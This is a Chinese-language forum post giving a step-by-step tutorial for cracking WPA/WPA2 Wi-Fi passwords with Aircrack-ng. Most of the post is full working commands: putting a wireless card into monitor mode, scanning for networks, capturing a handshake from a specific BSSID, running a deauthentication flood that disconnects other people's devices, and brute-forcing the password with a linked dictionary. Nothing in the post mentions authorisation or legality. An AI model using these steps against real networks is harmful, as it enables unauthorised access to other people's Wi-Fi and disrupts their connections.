设为首页
收藏本站
切换到宽版
登录
立即注册
找回密码
搜索
搜索
本版
帖子
用户
快捷导航
论坛
BBS
VIP用户组
官网群
无名商城论坛
»
论坛
›
资源分享区
›
学习资源专区
›
【HK】无线密码破解工具 - Aircrack-ng
返回列表
发帖
查看:
220
|
回复:
0
[其他技术]
【HK】无线密码破解工具 - Aircrack-ng
[复制链接]
无名
无名
当前离线
积分
32464
1万
主题
1万
帖子
3万
积分
管理员
积分
32464
发消息
发表于 2022-5-8 16:48:08
|
显示全部楼层
|
阅读模式
版本说明:Aircrack-ng1.6
下载地址:https://download.aircrack-ng.org/aircrack-ng-1.6.tar.gz
使用环境:Linux/Windows(kali自带)
工具说明:Aircrack-ng 是一款无线密码破解工具
一、工具说明
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。
Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。
该程序可运行在Linux和Windows上
如果在kali虚拟机里面破解无线密码的话需要插入外置网卡设备,设备能监听到数据即可,比如(RT3070),支持linux,免驱安装
在物理机则不需要,但是安装可能会比较麻烦,建议在kali里面弄
二、破解WPA/WPA2类WiFi操作
1、 查看可用的无线网卡
命令: airmon-ng
2、 将无线网卡以监听模式启动
命令:airmon-ng start wlan0
3、扫描周围WiFi
命令: airodump-ng wlan0mon
BSSID——wifi的mac地址、PWR——信号强度(结果一般是按强度排序)、Data——监听期间流量总合、CH——wifi所用信道、ENC——加密算法、ESSID——wifi名称
看到自己要破解的wifi后直接按Ctrl+C终止命令即可。
我们这里的目标是名为pentest的wifi,其BSSID为EE:45:6A:0D:32:7A,信道为1
2.4 开始抓取握手包并保存成文件
命令:airodump-ng -c 1 --bssid EE:45:6A:0D:32:7A -w /root/1/ wlan0mon
1.# -c指定信道,一定要是上一步查到的要破解的wifi所用信道
2.# -bssid指定bssid值,一定要是上一步查到的要破解的wifi的bssid
3.# -w指定捕获的握手到保存到的文件名
2.5 强制对方WIFI断开重连(获取握手包)
在上一步中我们是被动等待,我们何时能抓取到握手包依赖于何时有设备与该wifi完成成功的认证。
但对于上一步这种有已连接设备的wifi,其实我们可以使用aireplay-ng进行deauth洪水攻击使已连接他的设备掉线,掉线设备一般会自动重新连接wifi这样我们就能轻松获取握手包。
保持上步抓包命令不中断,新打开一个窗口执行:
命令:aireplay-ng -0 2 -a EE:45:6A:0D:32:7A -c 34:29:12:60:14:3E wlan0mon
1.# -0表示通知设备断开连接
2.# 2表示攻击次数,小点大点都行吧
3.# -a指定仿造的wifi的mac地址(即bssid)
4.# -c表示要让认证失效的设备的mac地址,在上一步中可以看到
如下图所示,我们抓到了让其重新认证的EE:45:6A:0D:32:7A的握手包。
使用Ctrl+C终止抓包命令即可
此时会在指定的目录产生以下四个文件(每执行一次抓包命令就会产生一组,所以抓包时要注意自己是第几次执行的;不管也行下一步执定文件时使用*号通配符即可)
6、使用字典文件暴力破解密码
字典:https://github.com/arthur0081/Blasting_dictionary
字典自己自行下载
aircrack-ng –a2 -b EE:45:6A:0D:32:7A -w common.txt ~/1/*.cap
1.# -a2 代表WPA的握手包
2.# -w指定要使用口令字典文件
3.# -b指定要目标wifi的mac地址(亦即bssid)
4.# *.cap是抓取到握手包的数据包文件,*是通配符
如果字典文件中存在wifi的密码,那就能找到wifi的密码,如果不包含那就找不到。
(所以笼统地讲wifi成功破解率依赖于字典大小)
7、 关闭网卡监听模式【可选】
在第二步中我们使用airmon-ng将网卡以监听模式启动,最后我们将网卡还原回去
airmon-ng stop wlan0mon
WiFi
,
手包
,
命令
,
Aircrack
,
上一
相关帖子
•
【原创教程】手机安装kali和sqlmap
•
【Max】如何挂载磁盘
•
【GD】Linux教程(2)
•
【FUT】metasploit(MSF)终端渗透工具命令大全
•
[局域网劫持]如何搞懵蹭网的同学-详细过程
•
【GD】iapp执行shell
•
【FUT】 R、【关●注哥】打开WiFi界面
回复
使用道具
举报
返回列表
发帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表